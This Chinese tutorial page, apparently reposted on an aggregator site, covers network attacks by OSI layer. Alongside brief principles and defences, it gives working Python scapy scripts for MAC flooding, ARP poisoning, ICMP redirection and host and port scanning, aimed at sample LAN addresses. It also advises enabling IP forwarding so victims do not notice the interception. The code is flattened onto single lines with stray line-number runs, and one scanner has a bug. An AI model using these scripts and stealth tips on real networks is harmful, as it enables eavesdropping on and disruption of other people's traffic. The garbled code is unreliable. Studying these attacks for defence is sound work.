网络攻击详解

职场网络冲突解决：理智沟通，避免网络攻击 #生活常识# #职场技巧# #网络素养#

常见的网络攻击，按照osi七层协议，可以分为：
1，物理层 线路侦听
2，数据链路层 mac_flood
3，网络层 arp_poison，icmp_redirection
4，传输层 tcp_flood(包含ack_flood和syn_flood)，udp_flood(ntp,dns)
7，应用层 connection_flood，http_get等等，

按照攻击目的，可以分为：
中间人攻击（为了获得网络数据）：mac_flood，arp_poison，icmp_redirection
拒绝服务攻击：tcp_flood，udp_flood，connection_flood，http_get

按照攻击者的位置，可以分为：
攻击者必须与攻击目标处于同一网段：mac_flood，arp_poison，icmp_redirection，线路侦听
不必处于同一网段：其他

=======================mac_flood===================================
原理：
mac地址泛洪，通过发送大量的随机源mac地址帧，攻击交换机的mac地址表，使换机的mac地址表填满，并拒绝增加新的合法mac地址条目。一旦网段里主机的mac地址无法增加进交换机的mac地址表，该主机的帧将被广播，攻击者将会收到该主机的网络信息。

表现：
突然的，网段中所有主机将会收到大量广播帧。

解决方法：
在交换机上做配置，限制每个端口匹配mac地址的总数。

攻击代码：

from scapy.all import * import time class Mac_flood: def __init__(self,times): self.times = times self.frame = Ether(dst=RandMAC('*:*:*:*:*:*'),src=RandMAC('*:*:*:*:*:*'))/IP(src=RandIP('*.*.*.*'),dst=RandIP('*.*.*.*')) def flood(self): for i in xrange(99999): t1 = time.time() sendp(self.frame,loop=1,count=self.times) t2 = time.time() print 'it takes',t2-t1,'seconds to send',self.times,'frames...' if __name__ =='__main__': mac_flood = Mac_flood(10000) mac_flood.flood()

1234567891011121314151617181920

==========================arp_poison===========================
原理：
利用arp协议的漏洞，攻击目标主机或网的arp列表，截取目标主机或网管的流量。攻击目标一般是对目标主机和网关同时进行。

表现：
网段中有ip地址突然改变mac地址。

解决方法：
主机使用静态的arp列表，对网关进行绑定。有条件的话，网管也要使用静态德arp列表，对主机绑定。

攻击代码：
tool.py

import os import time class Tool: def __init__(self): pass def enable_routing(self): os.system('sysctl net.ipv4.ip_forward=1') print 'start to route.' def disable_routing(self): os.system('sysctl net.ipv4.ip_forward=0') print 'routing finished.' def set_mac(self,iface,mac): os.system('ifconfig '+iface+' down') time.sleep(1) os.system('ifconfig '+iface+' hw ether '+mac) time.sleep(1) os.system('ifconfig '+iface+' up') time.sleep(1) print 'set_mac,mac is',mac def reset_mac(self): os.system('ifconfig enp3s0 down') time.sleep(1) os.system('ifconfig enp3s0 hw ether '+'34:64:a9:12:60:73') time.sleep(1) os.system('ifconfig enp3s0 up') time.sleep(1) print 'reset_mac,mac is :34:64:a9:12:60:73' def set_promisc(self,iface): os.system('ifconfig '+iface+' promisc') print 'set promisc' def set_non_promisc(self,iface): os.system('ifconfig '+iface+' -promisc') print 'set non_promisc' if __name__=='__main__': tool=Tool() tool.enable_routing() #tool.set_mac('enp3s0','00:11:22:22:22:22') #tool.reset_mac() #tool.set_non_promisc('enp3s0')

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647

先打开本机的路由功能，使得截取的流量依然能够到达目标主机，以免目标主机察觉。

arp_poison.py

from scapy.all import * import time import os class Arp_poison: def __init__(self,gateway_ip,victim_ip,iface): self.gateway_ip = gateway_ip self.victim_ip = victim_ip self.iface = iface def poison(self): #get mac from gateway and victim answer_gateway = srp1(Ether(dst='ff:ff:ff:ff:ff:ff')\ /ARP(pdst=self.gateway_ip),timeout=5,iface=self.iface) if answer_gateway is None: print 'there is no answer comes from gateway!' return -1; answer_victim = srp1(Ether(dst='ff:ff:ff:ff:ff:ff')\ /ARP(pdst=self.victim_ip),timeout=5,iface=self.iface) if answer_victim is None: print 'there is no answer comes from victim!' return -1; self.gateway_mac = answer_gateway.hwsrc self.victim_mac = answer_victim.hwsrc self.local_mac = answer_victim.dst #print mac info print 'gateway_mac is :',self.gateway_mac print "victim_mac is :",self.victim_mac print 'local_mac is :',self.local_mac #forge arp packet to_gateway = Ether(src='00:00:00:00:00:00',dst=self.gateway_mac)\ /ARP(op=2,hwsrc=self.local_mac,psrc=self.victim_ip,\ hwdst='00:00:00:00:00:00',pdst='0.0.0.0') to_victim = Ether(src='00:00:00:00:00:00',dst=self.victim_mac)\ /ARP(op=2,hwsrc=self.local_mac,psrc=self.gateway_ip,\ hwdst='00:00:00:00:00:00',pdst='0.0.0.0') #send it for i in xrange(99999): sendp([to_gateway,to_victim],iface=self.iface) time.sleep(0.5) if __name__ == '__main__': arp_poison = Arp_poison('192.168.1.1','192.168.1.202','enp3s0') arp_poison.poison()

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051

===============================icmp_redirect===================
原理：
攻击目标主机的路由表，使之定向到攻击者。

表现：
路由表发生改变，一般情况下是默认路由发生改变。

解决方法：
关闭icmp协议

攻击代码：

from scapy.all import * import time class Icmp_redirection: def __init__(self,victim_ip,gateway_ip,iface): self.victim_ip=victim_ip self.gateway_ip=gateway_ip self.iface=iface def redirect(self): #get victim_mac,gateway_mac answer_victim = srp1(Ether(dst='ff:ff:ff:ff:ff:ff')\ /ARP(pdst=self.victim_ip),timeout=5,iface=self.iface) if answer_victim is None: print 'there is no answer comes from victim.' answer_gateway = srp1(Ether(dst='ff:ff:ff:ff:ff:ff')\ /ARP(pdst=self.gateway_ip),timeout=5,iface=self.iface) if answer_gateway is None: print 'there is no answer comes from gateway!' self.gateway_mac = answer_gateway.hwsrc self.victim_mac = answer_victim.hwsrc self.local_mac = answer_victim.dst self.local_ip = answer_victim.pdst print 'gateway_mac is ',self.gateway_mac print 'victim_mac is ',self.victim_mac print 'local_mac is ',self.local_mac print 'local_ip is ',self.local_ip time.sleep(2) print 'start to redirect' time.sleep(0.5) #forge icmp data to_victim = Ether(src=self.gateway_mac,dst=self.victim_mac)\ /IP(src=self.gateway_ip,dst=self.victim_ip)\ /ICMP(type=5,code=1,gw=self.local_ip)\ /IP(src=self.victim_ip,dst='0.0.0.0') to_victim.show() #send it sendp(to_victim,loop=1,count=99999,inter=0.5) def cancel_redirect(self): pass if __name__ == '__main__': ir=Icmp_redirection('192.168.1.202','192.168.1.1','enp3s0') ir.redirect()

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455

攻击前，要记得打开路由功能，以免目标主机察觉。

===================================================================
以上三种攻击，均为中间人攻击，要求攻击者与被攻击者在同一网段，能够窃取目标主机的流量信息，危害严重。下面的攻击均为拒绝服务攻击，不要求在同一网段，不能够窃取目标主机的流量信息，以攻击目标主机，使之无法正常工作为目标，危害相对较小。

==================================================================

=================================syn_flood========================
原理：
tcp连接的三次握手过程中，例如a想与b建立tcp连接，三次握手分别是：1，a发送syn给b。2，b发送syn和ack给a。3，a发送ack给b。
对于b，每当收到来自a的syn，b都要分配一段内存，存放ip地址，端口号，序列号，时间戳等信息。如果a发送大量的syn请求，b就会不断的分配内存，结果会是：1，b的内存耗尽，无法相应服务请求，或是2，队列被填满，无法响应新来的合法的请求。无论是那种情况，结果都是拒绝服务。

表现：
服务器收到大量syn请求，并且该请求均无下文。

解决方法：
解决方法大体可以分为三类：
1，根据syn请求包的逻辑来判断syn请求是否合法，例如syn重传
2，修改主机操作系统相关参数，提高操作系统对syn_flood的防御能力，例如缩短syn_timeout时间，减小重发次数，增加队列容量
3，syn_cookie和syn_proxy
syn_cookie将需要储存在内存中的信息，通过一个hash函数，计算出一个cookie值，作为序列号，发送给对方，在收到syn后并不立即分配内存，而是等到收到ack，并验证后在分配内存，一定程度上解决了syn_flood攻击的问题（解决的问题是：收到syn不再立即分配内存了）。但是，使用syn_cookie，提高了cpu的计算压力（在于收到syn要计算cookie值，收到ack后要验证），实质上是一种用cpu计算资源换取内存空间的方案。并且，使得主机对于ack_flood攻击更加敏感。

syn_proxy是一种，将对于主机的tcp_flood攻击转嫁到syn_proxy上的方案。

攻击代码：
略

===============================ack_flood========================
原理：
主机在收到ack后，会查询队列种是否存在相应的syn，如果没有，则直接丢弃ack。因此ack_flood本来是一种较弱的网络攻击。但是，当主机打开了syn_cookie后，主机要处理的事情就变得复杂了，要通过复杂的计算，验证ack的合法性。因此，ack_flood主要攻击使用了syn_cookie的主机，使之cpu计算资源耗尽，拒绝服务。

表现：
同syn_flood，只不过ack标志为1，syn标志为0

解决方法：
参考syn_flood

=============================ntp_flood==========================
原理：
ntp_flood是一种反射型udp攻击，有两个特点：1，攻击者不直接攻击目标主机，而是构造包，将流量发给提供ntp(network time protocol)服务的主机。2，通过了ntp主机后，流量会被放大，造成目标主机网络拥堵。

表现：
主机收到大量的ntp流量

解决方法：
1，找运营商清洗流量
2，找到攻击者本人解决

==============================dns_flood=========================
原理：
发送大量的dns查询报文，使得dns服务器资源耗尽。

表现：
略

解决方法：
略

============================ip扫描和端口扫描=====================
ip扫描，扫描网段内开启的主机

from scapy.all import * import time class Ip_scan: def __init__(self): pass def scan(self,ip_set): arp_packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip_set) ans,uans = srp(arp_packet,timeout=3) alive_ip_list=[] for (send,receive) in ans: alive_ip_list.append(receive.getlayer('ARP').psrc) alive_ip_list.sort() for i in alive_ip_list: print "alive host :",i if __name__ == '__main__': ip_scan = Ip_scan() ip_scan.scan('192.168.1.1/24')

12345678910111213141516171819202122

扫描tcp端口
原理是：发送ack给目标主机的端口，如果无返回，则说明该端口被过滤，如果返回icmp不可达，说吗端口关闭，如果返回syn+ack，则说明端口是开放的。

from scapy.all import * import time class Tcp_scan: def __init__(self): pass def scan(self,ip_addr,port_set): filtered_port_list=[] opened_port_list=[] closed_port_list=[] tcp_segment = IP(dst=ip_addr)/TCP(dport=port_set,flags='S') print 'start to scan ',ip_addr ans,uans = sr(tcp_segment,timeout=3) for i in uans: filtered_port_list.append(i.getlayer('TCP').dport) for (send,receive) in ans: if receive.haslayer('ICMP'): if receive.getlayer('ICMP').type == 3 and\ receive.getlayer('ICMP').code == 3: closed_port_list.append(send.getlayer('TCP').dport) else: print 'get a ??? icmp answer,type is :'\ ,receive.getlayer('ICMP').type,'and code is:'\ ,receive.getlayer('ICMP').code,'...' elif receive.haslayer('TCP'): flags = receive.getlayer('TCP').flags if flags == 18: opened_port_list.append(receive.getlayer('TCP').sport) else: closed_port_list.append(receive.getlayer('TCP').sport) filtered_port_list.sort() closed_port_list.sort() opened_port_list.sort() print 'open port is :',opened_port_list print '###############################' print 'closed port is :',closed_port_list print '###############################' print 'filtered_port_list is :',filtered_port_list if __name__ == '__main__': tcp_scan = Tcp_scan() tcp_scan.scan('192.168.1.202',(1,1025))

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152

扫描udp端口
原理是：发送udp数据，如果返回udp，说明端口是开放的。如果返回icmp不可达，说明端口关闭。如果返回icmp，type为3,code为1,2,9,10,13，说明端口被过滤了。如果无回应，则有可能是过滤或者关闭。

from scapy.all import * import time class Udp_scan: def __init__(self): pass def scan(self,ip_addr,port_set): udp_datagram = IP(dst=ip_addr)/UDP(sport=3000,dport=port_set) print 'scan host',ip_addr,'......' ans,uans = sr(udp_datagram,timeout=3) open_port_list = [] closed_port_list = [] filtered_port_list = [] for (send,receive) in ans: if receive.haslayer('UDP'): open_port_list.append(i[1].getlayer('UDP').sport) if receive.haslayer('ICMP'): if (receive.getlayer('ICMP').type==3) and \ (receive.getlayer('ICMP').code==3): closed_port_list.append(send.getlayer('UDP').dport) if (receive.getlayer('ICMP').type==3) and \ receive.getlayer('ICMP').code in [1,2,9,10,13]: filtered_port_list.append(send.getlayer('UDP').dport) print 'open port :',open_port_list print '#######################' print 'closed port :',closed_port_list print '#######################' print 'filtered port :',filtered_port_list print '######################' print 'other port may be in filtered or opened state!!!!!!!!!!' if __name__ == '__main__': udp_scan=Udp_scan() udp_scan.scan('192.168.1.202',(1,1024))

1234567891011121314151617181920212223242526272829303132333435363738394041424344

网址：网络攻击详解 https://www.yuejiaxmz.com/news/view/522130

相关内容

防范黑客攻击：加强网络安全防护.docx
6年损失323亿美元，金融业成网络攻击重灾区
【网络安全】黑客攻击高管个人生活的 5 种方式
网络攻击悄然逼近，保护数字生活有诀窍！
网络安全学习路线图（2024版详解）
网络安全中黑客主要手段和攻击方法
无线网络安全防护建议详解!
金融理财类行业网站建设中的网络攻击及防范措施？
【网络安全】基础知识详解（非常详细）零基础入门到精通
黑客攻击多国网络 个人数字财产该如何保护？

随便看看